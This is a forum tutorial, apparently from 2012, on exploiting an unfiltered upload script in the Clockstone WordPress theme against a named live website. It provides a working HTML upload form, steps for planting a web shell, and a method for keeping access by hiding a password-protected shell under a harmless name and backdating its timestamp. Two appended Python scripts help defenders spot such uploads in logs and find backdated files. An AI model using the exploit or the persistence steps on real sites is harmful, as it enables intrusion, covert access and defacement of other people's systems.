[TUT] Uploading shell to WordPress using clockstone vulnerability
12-19-2012, 09:00 PM
#1
Greetings guys, I decided to make a small tutorial on how to get access to WP-powered websites which have an older clockstone version.
Credits to DigiP for finding this vulnerability.
Also, as an example I'll take http://razanime.com/. Since some skiddies already defaced it, I doubt you can do even more harm.
Ok, basically the vulnerability exists in wp-content/themes/clockstone/theme/functions/upload.php, which doesn't filter uploaded files and can be accessed remotely.
So we just make a simple HTML upload form; in this case it looks like this:
```html
<html>
<body>
<form enctype="multipart/form-data" action="http://razanime.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
Upload dir:<input type="text" name="url" value="./" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html>
```
Keep in mind that on some websites clockstone is in the Clockstone directory, so in the HTML above you need to change the action to somesite.com/wp-content/themes/Clockstone/theme/functions/upload.php
Save it as anything.html, run it in a browser and upload a shell of your choice.
You should get your file's name encoded in md5. I got this:
![[Image: 1picu.png]](http://imageshack.us/a/img543/9020/1picu.png)
To access your shell, replace upload.php in the URL bar with the name you see on the screen.
![[Image: 2pic.png]](http://imageshack.us/a/img832/5343/2pic.png)
As you see in the image above, the website already has 6 shells uploaded.
But I expected nothing less, after all it's already defaced.
Now I deleted all other shells and will hide my other shell, protected with a password, in one of the website's directories with an unsuspicious name, like class-file-backup.php. I will upload it to wp-content/plugins/wordpress-backup-to-dropbox/Classes/
![[Image: 3picq.png]](http://imageshack.us/a/img28/9325/3picq.png)
Ok, so now I uploaded my shell, and using it I changed its date of modification to the same as other files in that directory.
![[Image: 4pic.png]](http://imageshack.us/a/img594/6730/4pic.png)
![[Image: 5pic.png]](http://imageshack.us/a/img546/2122/5pic.png)
Now I will delete my first shell in /wp-content/themes/clockstone/theme/functions/
![[Image: 6pic.gif]](http://imageshack.us/a/img854/5795/6pic.gif)
And that's all, the website is successfully shelled.
Hope you liked it. If you did, feedback is always appreciated.
Info about vulnerability: http://packetstormsecurity.org/files/dow...-shell.pdf
Oh yes, I wrote this just to introduce you to this vulnerability, I take no responsibility for anything you will do. But I highly disapprove of such lame things as defaces or deletion of all website files.
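For site owners checking whether this upload path was used against them, an added example (not part of the original post) that triages web-server access logs for POSTs to the theme's upload.php and for later successful requests to MD5-named files in the same directory. The Combined Log Format, the sample lines, and the assumption that stored files are named as a 32-hex digest plus an extension are constructed for illustration.

```python
import re

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# The theme directory's case varies between installs: match case-insensitively.
FUNCS = r'/wp-content/themes/clockstone/theme/functions/'
UPLOAD = re.compile(FUNCS + r'upload\.php(?:\?|$)', re.I)
# Assumption: stored files are named as a 32-hex MD5 digest plus an extension.
DROPPED = re.compile(FUNCS + r'([0-9a-f]{32})\.\w+(?:\?|$)', re.I)

def triage(lines):
    """Return (upload_posts, dropped_file_hits) found in access-log lines."""
    posts, hits = [], []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the triage
        ip, when, method, path, status = m.groups()
        if method == "POST" and UPLOAD.search(path):
            posts.append((when, ip, status))
        d = DROPPED.search(path)
        if d and status.startswith("2"):
            hits.append((when, ip, d.group(1).lower()))
    return posts, hits

# Constructed sample lines (documentation IP ranges, made-up digest).
P = "/wp-content/themes/clockstone/theme/functions/"
SAMPLE = [
    '203.0.113.7 - - [19/Dec/2012:20:41:02 +0000] "POST ' + P
    + 'upload.php HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Dec/2012:20:41:30 +0000] "GET ' + P
    + '0123456789abcdef0123456789abcdef.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.9 - - [19/Dec/2012:20:50:11 +0000] "POST '
    '/wp-content/themes/Clockstone/theme/functions/upload.php HTTP/1.1" 404 0',
    '198.51.100.9 - - [19/Dec/2012:20:50:12 +0000] "GET '
    '/wp-content/themes/clockstone/style.css HTTP/1.1" 200 900',
    'not an access-log line',
]

if __name__ == "__main__":
    posts, hits = triage(SAMPLE)
    for row in posts:
        print("upload attempt:", row)
    for row in hits:
        print("dropped file served:", row)
```

Any legitimate traffic to this endpoint would come from an authenticated admin session, so every POST listed here deserves a look, and each digest in the second list names a file to pull from disk for inspection.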
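Setting a dropped file's modification date to match its neighbours, as the post describes, leaves a trace on POSIX filesystems: the inode change time (ctime) is set by the kernel and is not backdated along with mtime. An added example, not part of the original post, that flags PHP files whose ctime is an outlier in their directory while their mtime blends in; the directory name and the records in SAMPLE are constructed.

```python
import os
from statistics import median

def collect(root):
    """Yield (path, mtime, ctime) for every .php file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                st = os.lstat(path)  # lstat: do not follow symlinks
                yield path, st.st_mtime, st.st_ctime

def flag_backdated(records, slack=3600):
    """Flag files whose ctime is newer than their directory's median ctime
    by more than `slack` seconds while their mtime is not: the pattern of
    a file added later and given an older modification date."""
    by_dir = {}
    for rec in records:
        by_dir.setdefault(os.path.dirname(rec[0]), []).append(rec)
    flagged = []
    for entries in by_dir.values():
        if len(entries) < 3:
            continue  # too few siblings to form a baseline
        base_c = median(c for _, _, c in entries)
        base_m = median(m for _, m, _ in entries)
        for path, mtime, ctime in entries:
            if ctime - base_c > slack and mtime - base_m <= slack:
                flagged.append(path)
    return sorted(flagged)

# Constructed records: (path, mtime, ctime) as epoch seconds.
D = "wp-content/plugins/example-plugin/Classes"  # hypothetical directory
T = 1_350_000_000
SAMPLE = [
    (D + "/a.php", T, T + 5),
    (D + "/b.php", T, T + 5),
    (D + "/c.php", T, T + 6),
    # A legitimately updated file: mtime and ctime move together.
    (D + "/d.php", T + 6_000_000, T + 6_000_000),
    # Old-looking mtime, but the inode changed about 68 days after the rest.
    (D + "/class-file-backup.php", T, T + 5_900_000),
]

if __name__ == "__main__":
    print(flag_backdated(SAMPLE))
    # On a real host: flag_backdated(collect("/var/www/html/wp-content"))
```

ctime also moves on chmod, chown, rename or a restore from backup, so treat hits as leads and compare them against a clean copy of the plugin or theme.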